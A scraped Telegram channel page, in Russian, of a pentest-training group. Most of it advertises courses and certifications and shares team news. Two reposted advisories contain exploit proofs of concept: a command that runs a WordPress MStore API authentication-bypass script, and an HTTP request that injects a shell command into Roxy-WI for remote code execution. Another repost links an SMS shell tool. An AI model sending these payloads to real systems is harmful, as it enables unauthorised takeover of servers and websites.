en
Feedback
NETRUNNER GROUP

NETRUNNER GROUP

Open in Telegram

> По вопросам обращаться @TripiniFKYL < Заместитель - @netrunner_1G Discord - https://discord.gg/tqmrqRYPW5 Чат - https://t.me/+tkuqqLpFQPVhM2Zi Сайт - https://cybernetrunner.ru

Show more
3 515
Subscribers
-324 hours
-77 days
-930 days
Posts Archive
И снова здравствуйте ⛈ 🟢 Принят в разработку проект - база данных для безопасников (это если вкратце). Нацелен он на малый и
И снова здравствуйте ⛈ 🟢 Принят в разработку проект - база данных для безопасников (это если вкратце). Нацелен он на малый и средний бизнес для которого разворачивать большой отдел безопасности не представляется возможным. Как вы поняли мы двигаемся к B2B модели монетизации. Подробности о проекте будут рассказаны позже) 🟢 Если вы активно следите за каналом то знаете, у наших партнеров RESOLUTE ATTACK в скором времени будет 2 поток курса PRTT и до 1 августа есть возможность залететь по старой цене. Если хотите преисполниться в WEB петесте то вам определенно к ним 😉 Подробнее

HACKER POINT 🟢 Отошли от шока?) Сейчас вы опять это почувствуете, ведь мы работает 25/8 что бы вас удивлять Анонсируем предз
HACKER POINT 🟢 Отошли от шока?) Сейчас вы опять это почувствуете, ведь мы работает 25/8 что бы вас удивлять Анонсируем предзаказ нашего совместного курса с партнерами - командой CyberYozh Рецепт нашего курса прост: 📶29% теории 📶70% ПРАКТИКИ 📶Щепотка личного опыта от наших менторов 😉 (Но это секрет) Вас ждет незабываемый опыт анализа систем, поиска уязвимостей и, разумеется, тестирование на проникновение собственной персоной. Но лучше, скажем кратко, такого количества актуальной информации, нету ни у кого из наших конкурентов на рынке. Курс посвящён атакам на инфраструктуру, но также захватывает все необходимые теоретические знания и даже больше! Важно понимать, что мы делаем акцент на взлом именно инфраструктуры, это пожалуй, самое увлекательное в пентесте, я уже молчу о том что у нас самодельные тачки, об этом вы конечно можете прочитать на сайте. Желаю вам удачи в прохождении, будет сложно 😲 С любовью, команда NetRunner ❤️

И мы снова готовы вас шокировать ⛈ ❤️ Мы готовим полномасштабный проект, сериал о специалистах отдела безопасности в крупной
И мы снова готовы вас шокировать ⛈ ❤️ Мы готовим полномасштабный проект, сериал о специалистах отдела безопасности в крупной фирме и их жизненные ситуации расказывающие об основных ошибках в безопасности компаний. Сценарий уже почти готов, вносятся последние правки. 💀 Киллер фичей будет являться то что будут показаны реальные способы атак и их описание. Сериал будет интересен как знающим так и простым обывателям. 😈 Техническую поддержку нам будут обеспечивать наши любимые друзья и партнеры RESOLUTE ATTACK Список платформ куда выйдут серии (как минимум) : Youtube Rutube Dzen P.S. Хотите фото со сьемок?)

Repost from RESOLUTE ATTACK
PRTT - ОБЗОР ОТ СТУДЕНТОК Обзор от действующих студенток сертификационного курса PRTT 📺Трансляция: 15.07.2023 в 20:00 Студентки поделятся своим мнением, расскажут о плюсах и минусах первого потока. Рассмотрят часть методического материала, решат пару лабораторных задач, представленных на курсе.

Repost from RESOLUTE ATTACK
⚡️ PRTT - PENETRATION RED TEAM TESTER Наступил тот момент, который вы так долго ждали! Мы запускаем старт второго потока наше
⚡️ PRTT - PENETRATION RED TEAM TESTER Наступил тот момент, который вы так долго ждали! Мы запускаем старт второго потока нашей сертификации по тестированию на проникновение. Сертификация PRTT уже заявила о себе и готова идти дальше. Множество людей поддержало нас в развитии данной сертификации, мы готовы перевернуть свой листок истории, а готовы ли вы перевернуть свой? Старт: 01.10.2023 Стоимость: 40 000Р Длительность сертификационного курса: 4 месяца Как приобрести сертификацию? На нашем официальном сайте, в разделе сертификации, достаточно заполнить анкету участника Появились вопросы? Мы с радостью ответим - @PRTT_ATTACK Также, в честь запуска второго потока обучения мы открываем один эпизод из PRTT. Ждём вас на премьере. ⚡️Сегодня, в 18:00 мск - https://youtu.be/n381lZ06KIs

Repost from RESOLUTE ATTACK
⚡️ PRTT - PENETRATION RED TEAM TESTER Наступил тот момент, который вы так долго ждали! Мы запускаем старт второго потока наше
⚡️ PRTT - PENETRATION RED TEAM TESTER Наступил тот момент, который вы так долго ждали! Мы запускаем старт второго потока нашей сертификации по тестированию на проникновение. Сертификация PRTT уже дала заявить о себе, и готова идти дальше. Множество людей поддержало нас в развитии данной сертификации, мы готовы перевернуть свой листок истории, а готовы ли вы перевернуть свой? Старт: 01.10.2023 Стоимость: 40 000Р Длительность сертификационного курса: 4 месяца Как приобрести сертификацию? На нашем официальном сайте, в разделе сертификации, достаточно заполнить анкету участника Появились вопросы? Мы с радостью ответим - @PRTT_ATTACK Также, в честь запуска второго потока обучения мы открываем один эпизод из PRTT. Ждём вас на премьере. ⚡️Сегодня, в 18:00 мск - https://youtu.be/n381lZ06KIs

Доброго вечера друзья, и мы опять спешим вас порадовать ⛈ Совместно с компанией CyberYozh мы на днях анонсируем серьезный кур
Доброго вечера друзья, и мы опять спешим вас порадовать ⛈ Совместно с компанией CyberYozh мы на днях анонсируем серьезный курс посвящённый взлому инфраструктуры компаний, так же из тем будут присутствовать: 1) Естественно анонимность и создание своего окружения, лаборатории 2) Криптовалюта, анонимное использование и тд. 3) Девайсы для хакера и как ими пользоваться 4) Социальная инженерия 5) Форензика 6) Монетизация своих знаний Забавную отсылку можно найти тут) __ Новости по кусу "Подготовка к PRTT" 📣Вот и завершился первый месяц нашего курса "Подготовки к PRTT", Если хотите узнать мнение наших учеников, их отзывы будут на картинке в комментариях⬇️ Не смотря на все сложности которые мы уже преодолели, мы уделяем каждому ученику внимание и воспитываем этичных хакеров.

Доброго вечера друзья, и мы опять спешим вас порадовать ⛈ Совместно с компанией CyberYozh мы на днях анонсируем серьезный курс посвящённый взлому инфраструктуры компаний, так же из тем будут присутствовать: 1) Естественно анонимность и создание своего окружения, лаборатории 2) Криптовалюта, анонимное использование и тд. 3) Девайсы для хакера и как ими пользоваться 4) Социальная инженерия 5) Форензика 6) Монетизация своих знаний Забавную отсылку можно найти тут) __ Новости по кусу "Подготовка к PRTT" 📣Вот и завершился первый месяц нашего курса "Подготовки к PRTT", Если хотите узнать мнение наших учеников, их отзывы будут на картинке в комментариях⬇️ Не смотря на все сложности которые мы уже преодолели, мы уделяем каждому ученику внимание и воспитываем этичных хакеров.

Что вам нравится больше?
Anonymous voting

+6
1.png1.03 KB

Подборка из вариантов логотипа NetRunner ⛈ Как и обещали выкатываем голосование, все зависит от вас ☺️

Всем привет, очередные новости от NetRunner⛈ Во первых, хотелось бы рассказать о нашем оффлайн проекте. ⬇️ Так как наша задач
Всем привет, очередные новости от NetRunner⛈   Во первых, хотелось бы рассказать о нашем оффлайн проекте. ⬇️ Так как наша задача - популяризация ИБ, мы организуем кружки на базе школ для учеников. Первый запуск пройдет в городе Новосибирск. В следующем году будем открывать в популярных городах России. 📌Так же представляем вашему вниманию наш курс по по подготовке к PRTT на платформе наших друзей и партнеров из CyberYozh. Курс будет проходить на платформе CyberYozh Academy название курса "WEB pentest base". В курсе 24 модуля и 31 практическое задание. Курс будет по сниженной цене, без менторства. Наверняка уже все заметили что у нас поменялся логотип канала. На днях мы выпустим пост с логотипами и проведем голосование за лучший логотип Netrunner на ваш выбор. ❗️Просим проявить максимальную активность в голосовании

Repost from RESOLUTE ATTACK
Тут говорят новый поток PRTT планируют в Октябре запустить

Repost from linkmeup
Отлично! Теперь шелл можно и через SMS пропихнуть. Пока безопасники бьются с DLP, настраивают политики и заливают порты эпоксидкой, просто отправь SMS на номер.TCPoverSMS, my ass. https://github.com/persistent-security/SMShell

⛈ Новости которые у нас есть для вас и ситуация у нас во внутренней кухне. Начнем с позитивного. Есть несколько хороших новос
⛈ Новости которые у нас есть для вас и ситуация у нас во внутренней кухне. Начнем с позитивного. Есть несколько хороших новостей. 1) Мы разрабатываем свою обучающую платформу. Чуть позже покажем дизайн. Он вам очень понравится. Мы развиваемся и совершенствуемся, чтобы предоставлять вам качественные материалы и полную поддержку. 2) Для участников нашего курса ведется разработка бесплатного дополнения (по желаниям самих учеников) и не только Теперь немного о грустном: Вследствие некоторых обстоятельств уже бывший сотрудник попытался нас шантажировать и после неудачной попытки попытался распространить материалы курса. Меры приняты, утечку локализовали. Оказалось, что с подобными сотрудниками информация - в опасности. Не все могут работать в области информационной безопасности 😒 Коммерческая тайна, конфиденциальность, да и просто человеческое доверие для некоторых - пустой звук. Большое спасибо всем участникам текущего потока за поддержку и понимание нашей команды. Мы вас любим и ценим! Грустно, когда предают. С уважением, команда NetRunner ❤️

Repost from Похек
MStore API &lt;= 3.9.2 - Authentication Bypass CVE-2023-2732 Плагин MStore API для WordPress уязвим для обхода аутентификации
MStore API <= 3.9.2 - Authentication Bypass CVE-2023-2732 Плагин MStore API для WordPress уязвим для обхода аутентификации в версиях до 3.9.2 включительно. Это связано с недостаточной проверкой пользователя во время REST API запроса на добавление объявлений через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например администратора, если у них есть доступ к идентификатору пользователя. PoC:
git clone https://github.com/RandomRobbieBF/CVE-2023-2732 ; pip3 install -r requirements.txt ; python3 mstore-api.py -u http://TARGET


#CVE #POC

⛈Всем обучающимся или будущим абитуриентам курса подготовки к PRTT По завершению второго и третьего месяца обучения на нашем
⛈Всем обучающимся или будущим абитуриентам курса подготовки к PRTT По завершению второго и третьего месяца обучения на нашем курсе, будет проходить отбор из лучших учеников  для практики, c нашими ведущими специалистами из отдела Pentest. 🟢На практике вы получите: 1. Доступ к реальным кейсам компании 2. Личные практические задания 3. Корпоративный контент ❗️По мнению нашей команды практика лучший способ погрузиться в профессию!

Repost from RESOLUTE ATTACK
⬜️PH DAYS 12 BY RESOLUTE ATTACK Видеообзор мероприятия от лица нашей команды. Positive technologies, Codeby, Innostage и другие известные компании. 🔥Победители и призёры STANDOFF: Codeby, True0xA3, Bulba Hackers. Интервью с победителями соревнования. Участники мероприятия. Розыгрыш фирменных футболок. И многое другое в нашем видеоролике - https://youtu.be/MYfDoC2JC4M

Repost from Похек
​​🔴Roxy WI v6.1.0.0 Unauthenticated Remote Code Execution (RCE) via subprocess_execute CVE-2022-31137 Это уязвимость удаленного выполнения кода в Roxy-WI, веб-интерфейсе для управления серверами Haproxy, Nginx, Apache и Keepalived. Уязвимость вызвана неправильной обработкой пользовательского ввода в файле /app/options.py. Злоумышленник может использовать эту уязвимость, отправив специально подготовленный HTTP-запрос, который содержит вредоносный код. Вредоносный код будет выполнен на уязвимой системе с привилегиями пользователя, запускающего Roxy-WI. PoC:
POST /app/options.py HTTP/1.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://192.168.1.44
Referer: https://192.168.1.44/app/login.py
Connection: close

show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=
";id+##&backend_server=127.0.0.1 #CVE #POC

NetRunner ищет новые кадры к себе в команду Мы станем вашим трамплином в профессиональную деятельность Нам нужны: - Начинающи
NetRunner ищет новые кадры к себе в команду Мы станем вашим трамплином в профессиональную деятельность Нам нужны: - Начинающий Web-дизайнер креативщик (Figma) - SMMщик для YouTube - Маркетолог - Монтажер Контакты для связи: @netrunner_1G